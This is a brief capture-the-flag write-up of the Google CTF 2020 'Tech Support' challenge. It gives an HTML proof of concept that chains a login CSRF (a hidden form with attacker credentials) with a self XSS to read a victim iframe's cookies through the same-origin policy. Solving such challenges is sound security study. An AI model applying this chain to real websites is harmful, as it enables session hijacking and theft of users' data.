Google CTF 2020 – Tech Support (Trick Abuse Self XSS, CSRF login, improper session management)

Requirements: a self XSS, a login CSRF, and a session quirk: a valid session already open in another tab stays usable, and no script re-login is performed.


<iframe src="" id="first"></iframe>
<iframe srcdoc='<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState("", "", "/")</script>
  <form action="" method="POST" id="formlogin">
    <input type="hidden" name="username" value="lala" />
    <input type="hidden" name="password" value="lala@123" />
    <input type="hidden" name="csrf" value="" />
    <input type="submit" value="Submit request" />
  </form>
</html>' id="second"></iframe>

<!-- Self XSS chain:

1. Create iframe 1 with the target victim's session active in it.
2. Create iframe 2 that performs a CSRF login as the attacker, so the attacker's session is active in it.
3. Because iframe 1 and iframe 2 share the target's origin, the same-origin policy lets the self XSS running in iframe 2 read data from iframe 1 (cookie, page content, ...) with "[0].document.cookie".
-->